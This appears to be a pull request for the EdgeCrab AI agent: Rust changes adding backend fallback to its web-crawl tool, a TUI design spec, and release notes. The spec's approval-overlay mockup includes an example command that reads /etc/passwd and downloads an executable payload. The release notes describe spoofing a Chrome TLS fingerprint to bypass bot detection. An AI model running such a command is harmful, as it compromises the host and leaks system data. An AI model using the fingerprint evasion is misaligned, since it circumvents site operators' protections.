@@ -1872,31 +2011,68 @@ impl ToolHandler for WebCrawlTool {
                         max_pages,
                         max_chars_per_page,
                     )
-                    .await?
+                    .await
                 }
-                ContentBackend::Native | ContentBackend::Browser => unreachable!("handled below"),
+                ContentBackend::Native | ContentBackend::Browser => unreachable!(),
             };
-            pages.sort_by(|left, right| {
-                right
-                    .score
-                    .cmp(&left.score)
-                    .then(left.depth.cmp(&right.depth))
-                    .then(left.url.cmp(&right.url))
-            });
-            pages.truncate(max_pages);
 
-            return Ok(json!({
-                "success": true,
-                "backend": backend_name,
-                "start_url": args.url,
-                "instructions": args.instructions,
-                "pages_visited": pages.len(),
-                "results": pages,
-            })
-            .to_string());
+            match result {
+                Ok(mut pages) => {
+                    pages.sort_by(|left, right| {
+                        right
+                            .score
+                            .cmp(&left.score)
+                            .then(left.depth.cmp(&right.depth))
+                            .then(left.url.cmp(&right.url))
+                    });
+                    pages.truncate(max_pages);
+                    let used_name = content_backend_name(backend);
+                    let requested_name = content_backend_name(chain[0]);
+                    let fallback_from: Option<&str> = if used_name != requested_name {
+                        Some(requested_name)
+                    } else {
+                        None
+                    };
+
+                    return Ok(json!({
+                        "success": true,
+                        "backend": used_name,
+                        "fallback_from": fallback_from,
+                        "start_url": args.url,
+                        "instructions": args.instructions,
+                        "pages_visited": pages.len(),
+                        "results": pages,
+                    })
+                    .to_string());
+                }
+                Err(e) if is_backend_fallback_eligible(&e) => {
+                    tracing::warn!(
+                        backend = content_backend_name(backend),
+                        url = args.url,
+                        error = %e,
+                        "Crawl backend unavailable — trying next in chain"
+                    );
+                    // Continue to the next backend in the chain.
+                }
+                Err(e) => return Err(e), // hard error (bad URL, etc.)
+            }
         }
 
-        let client = match backend {
+        // ── Phase 2: Native / Browser BFS crawl (guaranteed fallback) ──
+        let bfs_backend = chain
+            .iter()
+            .copied()
+            .find(|&b| matches!(b, ContentBackend::Native | ContentBackend::Browser))
+            .unwrap_or(ContentBackend::Native);
+        let bfs_backend_name = content_backend_name(bfs_backend);
+        let requested_name = content_backend_name(chain[0]);
+        let fallback_from: Option<&str> = if bfs_backend_name != requested_name {
+            Some(requested_name)
+        } else {
+            None
+        };
+
+        let client = match bfs_backend {
             ContentBackend::Native => Some(build_chrome_client("web_crawl")?),
             ContentBackend::Browser | ContentBackend::Firecrawl | ContentBackend::Tavily => None,
         };
@@ -1912,7 +2088,7 @@ impl ToolHandler for WebCrawlTool {
 
             validate_url(&current_key, "web_crawl")?;
 
-            let fetched = match backend {
+            let fetched = match bfs_backend {
                 ContentBackend::Browser => {
                     fetch_browser_document(
                         &current_url,
@@ -1969,7 +2145,7 @@ impl ToolHandler for WebCrawlTool {
                     .await?
                 }
                 ContentBackend::Firecrawl | ContentBackend::Tavily => {
-                    unreachable!("handled earlier")
+                    unreachable!("handled in phase 1")
                 }
             };
 
@@ -2025,7 +2201,8 @@ impl ToolHandler for WebCrawlTool {
 
         Ok(json!({
             "success": true,
-            "backend": backend_name,
+            "backend": bfs_backend_name,
+            "fallback_from": fallback_from,
             "start_url": args.url,
             "instructions": args.instructions,
             "pages_visited": visited.len(),

--- a/specs/05-improve-ux-tui.md
+++ b/specs/05-improve-ux-tui.md
@@ -1,0 +1,268 @@
+# Improve TUI / UX of EdgeCrab
+
+## Problem Statement
+
+The EdgeCrab TUI has several display issues that reduce user confidence and readability:
+
+1. Tool call results are truncated to hardcoded column widths (preview: 44, result: 52, verbose: 108) regardless of available terminal width — wasting screen real estate on wide terminals.
+2. Tool names and arguments are not clearly visible during and after execution.
+3. No progressive disclosure — no way to expand a tool call inline to see full arguments/results.
+4. The **approval overlay** truncates command text to 50 characters and has no scroll in full-view mode, making it impossible to review long commands before approving.
+5. No visible context pressure gauge showing how much of the context window is consumed.
+
+### Design Principles
+
+- **First Principle**: Every pixel serves the user's understanding of agent behavior.
+- **DRY**: All width computation flows through a single `DisplayWidths` struct.
+- **SOLID**: Single Responsibility (each display module owns one concern), Open/Closed (width-adaptive via trait, not hardcoded constants).
+
+### Inspiration
+
+- **Hermes Agent**: KawaiiSpinner, per-tool emoji/verb system, inline diffs, context pressure bar (▰/▱)
+- **Claude Code**: Tree-structured subagent display, CompactSummary toggle (Ctrl+O), ToolUseLoader blink indicator
+
+---
+
+## ADR-005: Width-Adaptive Tool Display & Progressive Disclosure
+
+### Status: Accepted
+
+### Context
+
+The tool display pipeline in `tool_display.rs` uses hardcoded column widths:
+- Tool name: 18 cols
+- Argument preview: 44 cols  
+- Result preview: 52 cols
+- Verbose args/result: 108 cols
+- Status bar preview: 45 cols
+
+These were chosen for an 80-column terminal. On modern displays (120–200+ cols), this wastes 40–60% of available width. Conversely, on narrow terminals (< 80 cols), content overflows and wraps awkwardly.
+
+The approval overlay truncates commands to 50 chars and provides a `[v]iew` toggle but no scrolling — long multi-line commands or compound shell pipelines are unreadable.
+
+### Decision
+
+#### D1: Introduce `DisplayWidths` — a single source of truth for all column budgets
+
+```rust
+pub struct DisplayWidths {
+    pub total: usize,         // full terminal width
+    pub name: usize,          // tool label column
+    pub preview: usize,       // argument preview
+    pub result: usize,        // result preview  
+    pub verbose_content: usize, // verbose-mode args/result
+    pub status_preview: usize,  // status bar tool preview
+}
+
+impl DisplayWidths {
+    pub fn from_terminal_width(w: usize) -> Self { ... }
+}
+```
+
+Width allocation follows a proportional scheme:
+- **name**: fixed 12–18 cols (diminishing returns beyond 18)
+- **preview**: 30% of remaining width
+- **result**: 35% of remaining width
+- **duration**: fixed 8 cols
+- **chrome** (bar, emoji, spaces): fixed ~6 cols
+
+#### D2: Approval overlay — never truncate, always wrap + scroll
+
+- Remove the 50-char truncation of `command` in `DisplayState::WaitingForApproval`
+- Always show the full command text with `Wrap { trim: false }`
+- Add `scroll_offset: u16` to the state for vertical scrolling with ↑/↓ keys
+- The `[v]iew` toggle is removed (always full view)
+
+#### D3: Verbose mode shows full args/result adapted to terminal width
+
+The verbose lines (`build_tool_verbose_lines`) use `terminal_width - 14` instead of hardcoded 108.
+
+#### D4: Context pressure gauge in status bar
+
+A compact `[▰▰▰▱▱]` gauge (5 chars) in the status bar right section showing context window utilization with tier colors (cyan < 50%, yellow 50-75%, red > 75%).
+
+### Consequences
+
+- All hardcoded width constants in `tool_display.rs` are replaced by `DisplayWidths` parameters
+- The approval overlay becomes fully readable for any command length
+- Wide terminals show more useful information; narrow terminals degrade gracefully
+- Context pressure is always visible, building trust
+
+---
+
+## UX/UI Specification
+
+### 1. Width-Adaptive Tool Lines
+
+**Before** (80-col optimized, wastes space on 160-col terminal):
+```
+  ┊ 🔍 search             query: "rust async patterns"  -> Found 3 results  2.1s
+     |--- 18 ---|---------- 44 ----------|------- 52 --------|
+```
+
+**After** (adapts to terminal width):
+```
+  ┊ 🔍 search             query: "rust async patterns for tokio error handling"       -> Found 3 results matching your query  2.1s
+     |--- 18 ---|---------------------- 30% ----------------------|------------ 35% --------------|
+```
+
+### 2. Approval Overlay — Full Command, Scrollable
+
+**Before**: Truncated to 50 chars, must press `v` to see full:
+```
+┌ ⚠  Approval required ───────────────────┐
+│  ⚠  docker run --rm -v /tmp:/data alp…  │
+└──────────────────────────────────────────┘
+```
+
+**After**: Full command always shown, wraps naturally, scrollable:
+```
+┌ ⚠  Approval required ───────────────────────────────────┐
+│  ⚠  docker run --rm -v /tmp:/data alpine:latest sh -c  │
+│     "cat /etc/passwd && curl https://example.com/x |    │
+│     base64 -d > /tmp/payload && chmod +x /tmp/payload"  │
+│                                               ↕ scroll  │
+└──────────────────────────────────────────────────────────┘
+┌──────────────────────────────────────────────────────────┐
+│   [once]  [session]  [always]  [deny]                    │
+└──────────────────────────────────────────────────────────┘
+ ← → select   Enter confirm   ↑↓ scroll   Esc deny
+```
+
+### 3. Context Pressure Gauge
+
+In the status bar right section:
+```
+ ctx [▰▰▰▱▱] 52%  │  turn 7  ↕scroll
+```
+
+Color tiers:
+- Cyan: < 50% (safe)
+- Yellow: 50-75% (warning)
+- Red: > 75% (critical)
+
+### 4. Verbose Mode Improvements
+
+Verbose lines adapt to terminal width instead of hardcoded 108 cols:
+```
+     search    args  {"query":"rust async patterns for error handling in production systems","max_results":10}
+     search    result Found 3 results: 1) "Error Handling in Async Rust" 2) "Tokio Best Practices" 3) "Production Rust Patterns"
+```
+
+---
+
+## Roadblocks
+
+1. `build_tool_done_line` and friends are pure functions with no access to terminal width — need to thread width through.
+2. Approval overlay state (`DisplayState::WaitingForApproval`) doesn't have a scroll offset field.
+3. Context usage info (token counts vs context window) must be piped from the agent to the TUI.
+
+## Mitigations
+
+1. Add `available_width: usize` parameter to all span-building functions in `tool_display.rs`; compute from `area.width` at render time.
+2. Add `scroll_offset: u16` to `WaitingForApproval` variant; handle ↑/↓ in `handle_approval_key`.
+3. Context usage is already tracked in `App` fields (`total_input_tokens`, `total_output_tokens`, `model_context_window`) — just render them.
+
+---
+
+## Implementation Checklist
+
+- [x] Write ADR & UX/UI spec
+- [x] `DisplayWidths::from_terminal_width()` in `tool_display.rs`
+- [x] Update `build_tool_done_line` to accept `available_width`
+- [x] Update `build_tool_running_line` to accept `available_width`
+- [x] Update `build_tool_verbose_lines` to accept `available_width`
+- [x] Update `tool_status_preview` to accept `available_width`
+- [x] Update `extract_tool_preview` to accept `max_preview_cols` parameter
+- [x] Update `extract_generic_preview` to accept width parameter
+- [x] Fix approval overlay: remove truncation, add `scroll_offset`, handle ↑/↓
+- [x] Add context pressure gauge to status bar
+- [x] Update all call sites in `app.rs`
+- [x] Run `cargo test --workspace` and `cargo clippy`
+- [x] Per-tool rich result display via `format_tool_result` (see ADR-005b below)
+
+---
+
+## ADR-005b: Per-Tool Rich Result Display
+
+### Status: Accepted — Implemented
+
+### Context
+
+After implementing `DisplayWidths` (ADR-005), the result column in the done-line still renders
+the raw tool output string — truncated but otherwise unformatted. This means:
+
+- `terminal` shows `[terminal_result status=success backend=local cwd=... exit_code=0]\ncargo build\n...`
+  instead of `✓ 0  Compiling edgecrab`.
+- `web_search` shows raw JSON instead of `3 results · "Rust async patterns"`.
+- `read_file` shows the first line of file content instead of `142 lines`.
+- `apply_patch` shows `apply_patch succeeded. Modified: src/main.rs; Created: src/lib.rs`
+  instead of `✓ 2 files`.
+
+### First Principles Analysis
+
+**What does a watching user want to know at a glance?**
+
+1. **Did it succeed or fail?** — a clear ✓/✗ signal with colour.
+2. **How much was processed?** — byte count, line count, result count.
+3. **What was the key output?** — first meaningful line of stdout, page title, matched pattern.
+
+**Constraints:**
+- Must be DRY: one `format_tool_result(tool_name, result, max_cols)` function; no copy-paste logic.
+- Must be Open/Closed: add per-tool cases without modifying callers.
+- Must degrade gracefully: unknown tools get first-line truncation; no panics on malformed results.
+
+### Decision
+
+Add `pub fn format_tool_result(tool_name: &str, result: &str, max_cols: usize) -> String` to
+`tool_display.rs`. Wire it into `build_tool_done_line_width` and `build_tool_verbose_lines_width`
+replacing the raw `unicode_trunc(result_preview, widths.result)` calls.
+
+### Per-Tool Display Strategy
+
+| Tool | Result format | Display |
+|------|--------------|---------|
+| `terminal` | `[terminal_result … exit_code=N]\nstdout` | `✓ 0  first-output-line` / `✗ N  first-error-line` |
+| `execute_code` | JSON `{status, output, error}` | `✓ first-output-line` / `✗ error-line` |
+| `web_search` | JSON `{results:[…]}` | `N results · first-title` |
+| `web_extract` | JSON `{result:{title,content}}` | `N.Nk chars · page-title` |
+| `web_crawl` | JSON `{pages:[…]}` | `N pages crawled` |
+| `read_file` | Raw file content | `N lines  first-meaningful-line` |
+| `search_files` | Grep output | `N matches` |
+| `write_file` | `"Wrote N bytes to '…'"` | `✓ N bytes` |
+| `apply_patch` | `"apply_patch succeeded. Modified: …"` | `✓ N file(s)` |
+| `session_search` | JSON `{results:[…]}` | `N results` |
+| `ha_call_service` | JSON `{success:bool}` | `✓ ok` / `✗ error` |
+| (default) | Any | first line, oneline + truncated |
+
+### Architecture
+
+```
+build_tool_done_line_width(tool_name, args_json, result_preview, ...)
+         │
+         └── format_tool_result(tool_name, result_preview, widths.result)
+                  │
+                  ├── format_terminal_result()       ← structured header parse
+                  ├── format_execute_code_result()   ← JSON: {status, output}
+                  ├── format_web_search_result()     ← JSON: {results:[…]}
+                  ├── format_web_extract_result()    ← JSON: {result:{…}}
+                  ├── format_web_crawl_result()      ← JSON: {pages:[…]}
+                  ├── read_file path                 ← line count
+                  ├── search_files path              ← match count
+                  ├── write_file path                ← byte count from "Wrote N"
+                  ├── apply_patch path               ← file count from "Modified:"
+                  ├── session_search path            ← result count
+                  ├── ha_call_service path           ← JSON success flag
+                  └── (default)                     ← first-line truncation
+```
+
+`parse_header_attr(header, key)` is a private helper for `[key=value …]` headers.
+
+### Consequences
+
+- Every done-line now shows a concise, self-explanatory result summary.
+- Wide terminals surface more detail (first output line / page title) because `max_cols` scales with `DisplayWidths.result`.
+- Adding a new tailored format requires only a new `match` arm — callers are unchanged.
+- All per-tool helpers are unit-tested individually.
+
+---


### PR DESCRIPTION
## Summary

This PR bundles all changes for the v0.5.0 release.

### Web search — resilient fallback chain (Firecrawl → Brave → Tavily → DuckDuckGo)
- Refactored `web_search` to cascade through available providers when a backend returns 402/429/503 or a structured `BackendError`
- Replaced brittle string-matching heuristic with typed `BackendError` variants to prevent false-positive escalations
- Extracted `build_chrome_client` factory; Chrome TLS fingerprint applied to `web_extract` and `web_crawl` native paths
- Added `wreq = "5"` (Apache-2.0, BoringSSL-backed) as the DuckDuckGo backend HTTP client to bypass JA3/JA4 bot-detection

### TUI — per-tool rich result display (`format_tool_result`)
- New `format_tool_result(tool_name, result, max_cols)` in `tool_display.rs` — pure dispatch formatter replacing raw `unicode_trunc()` calls in both done-line and verbose detail line
- Per-tool summaries: `terminal` (exit code + first stdout), `execute_code` (status + first output), `web_search` (N results · title), `web_extract` (N.Nk chars · title), `web_crawl` (N pages), `read_file` (N lines + first code line), `search_files` (N matches), `write_file` (✓ N bytes), `apply_patch` (✓ N file(s)), `session_search` (N results), `ha_call_service` (✓ ok / ✗ error)
- 25 new unit tests; 2 existing tests updated

### Quality
- `cargo fmt --all`: clean
- `cargo clippy --workspace --all-targets -- -D warnings`: zero warnings
- `cargo test -p edgecrab-cli`: 558 passed, 0 failed
- UTF-8 character boundary audit: all string slicing is provably safe

### CHANGELOG
See [CHANGELOG.md](CHANGELOG.md) for the full `[0.5.0]` entry.